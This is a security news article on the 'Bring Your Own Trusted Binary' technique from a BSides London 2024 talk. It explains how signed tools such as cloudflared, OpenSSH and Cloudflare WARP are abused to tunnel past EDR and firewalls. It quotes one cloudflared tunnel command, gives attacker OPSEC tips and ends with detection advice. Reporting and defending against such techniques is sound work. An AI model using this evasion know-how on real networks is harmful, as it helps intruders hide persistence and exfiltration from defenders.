A recent cybersecurity presentation at BSides London 2024 has unveiled a sophisticated attack technique known as Bring Your Own Trusted Binary (BYOTB).
This method leverages legitimate, trusted binaries to evade detection by advanced security measures such as Endpoint Detection and Response (EDR) systems and firewalls.
The findings, presented by cybersecurity researcher David Kennedy of Jumpsec Labs, shed light on how attackers are increasingly exploiting trusted tools to conduct covert operations.
Exploiting Trusted Tools for Malicious Purposes
The BYOTB technique capitalizes on the inherent trust placed in legitimate binaries, such as Cloudflare’s cloudflared and OpenSSH utilities.
These binaries, often digitally signed and widely used for legitimate purposes, are repurposed by attackers to bypass security controls.
For instance, Kennedy demonstrated how the cloudflared binary can be used to tunnel SSH traffic over HTTPS (port 443), effectively bypassing network restrictions and evading detection by security tools like CrowdStrike EDR.
By employing commands such as cloudflared tunnel run --token YourTokenHere, attackers can establish encrypted tunnels that appear benign.
These tunnels can then be used for reverse port forwarding or SOCKS proxying, enabling attackers to exfiltrate data or maintain persistent access to compromised systems.
OpenSSH binaries were also highlighted as a means to establish remote access by deploying them alongside necessary dependencies like libcrypto.dll.
Advanced Techniques and OPSEC Considerations
Kennedy further elaborated on advanced techniques, including the use of Cloudflare’s WARP client as an alternative to traditional SSH tunneling.
This approach acts like a VPN, allowing attackers to access target networks without relying on SSH or Proxychains.
Additionally, a “double tunnel” method was described, where attackers reroute traffic through multiple layers of tunnels to evade firewall rules that block specific ports.
Despite the effectiveness of these methods, Kennedy emphasized the importance of operational security (OPSEC) for attackers.
According to the Jumpsec Labs, overloading trusted binaries with excessive traffic or failing to conceal their presence could trigger alerts, compromising the attack.
To mitigate the risks posed by BYOTB attacks, organizations must adopt proactive monitoring and detection strategies:
- Process Telemetry: Monitor command-line arguments for suspicious keywords like “tunnel” or “access,” which may indicate misuse of binaries like
cloudflared. - DNS Logging: Track queries to domains associated with tunneling tools (e.g.,
argotunnel.com) to identify potential abuse. - Firewall Rules: Restrict outbound traffic on non-essential ports and monitor for anomalies in port usage.
- File Monitoring: Detect unauthorized downloads of trusted binaries from platforms like GitHub by verifying file hashes against approved lists.
These measures, combined with regular updates to endpoint security solutions and employee awareness training, can help organizations defend against BYOTB tactics.
The rise of BYOTB attacks underscores the evolving tactics of threat actors who exploit trusted tools for malicious purposes.
By leveraging legitimate binaries, attackers can blend into normal network activity, making detection significantly more challenging.
As these techniques gain traction among cybercriminals, it is imperative for organizations to enhance their defensive capabilities and remain vigilant against emerging threats.
Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox -Â Try for Free
